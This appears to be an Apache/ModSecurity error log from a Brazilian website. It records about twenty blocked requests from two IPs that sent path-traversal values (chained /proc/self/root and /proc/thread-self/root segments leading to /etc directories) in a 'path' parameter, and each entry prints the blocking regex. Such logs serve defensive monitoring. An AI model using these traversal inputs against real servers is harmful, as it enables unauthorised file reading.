[Tue Mar 17 09:31:59.721565 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:39630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJvweiSKl8TjouI-YCSgAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:00.808042 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.241.46:47266] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJwAb2qCuy5irgBMjJNQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:00.993801 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.243.203:36640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJwAb2qCuy5irgBMjJNgAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:02.589400 2026] [:error] [pid 2553:tid 140411666392832] [client 74.7.241.46:47270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJwv0Bec_B9OkZP_i9HgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:02.647446 2026] [:error] [pid 1210:tid 140411649607424] [client 74.7.243.203:36652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJwlKJy4A1bGlmj9BVvAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:04.041600 2026] [:error] [pid 2553:tid 140411565680384] [client 74.7.243.203:36656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJxP0Bec_B9OkZP_i9HwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:04.866846 2026] [:error] [pid 1731:tid 140411691570944] [client 74.7.241.46:47280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJxAb2qCuy5irgBMjJOgAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:05.475413 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:36660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJxaBJNF7axNlVR0X8hwAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:06.210621 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.241.46:47294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJxpDEJR9VXonE_-1PBgAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:06.831135 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:36666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJxu82sZHvlq4xgHrCewAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:07.431981 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.241.46:47296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJx5qmL8PQht4WJFlH7gAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:07.973526 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:36676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJxweiSKl8TjouI-YCSwAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:10.003802 2026] [:error] [pid 11469:tid 140411540502272] [client 74.7.241.46:48956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJyJDEJR9VXonE_-1PCAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:10.003972 2026] [:error] [pid 1016:tid 140411666392832] [client 74.7.243.203:36680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJyZqmL8PQht4WJFlH7wAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:11.374022 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:57938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJyweiSKl8TjouI-YCTAAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:12.460611 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:48960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJzO82sZHvlq4xgHrCfwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:12.596955 2026] [:error] [pid 2159:tid 140411599251200] [client 74.7.243.203:57942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJzPct6CQ8jnRyg2p8XAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:13.790564 2026] [:error] [pid 2553:tid 140411616036608] [client 74.7.241.46:48968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJzf0Bec_B9OkZP_i9IwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:13.902888 2026] [:error] [pid 2159:tid 140411590858496] [client 74.7.243.203:57958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJzfct6CQ8jnRyg2p8XgAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:14.998569 2026] [:error] [pid 11469:tid 140411691570944] [client 74.7.241.46:48976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJzpDEJR9VXonE_-1PCQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:15.241231 2026] [:error] [pid 1016:tid 140411616036608] [client 74.7.243.203:57974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJz5qmL8PQht4WJFlH8gAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:16.480727 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.203:57976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ0AeiSKl8TjouI-YCTgAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
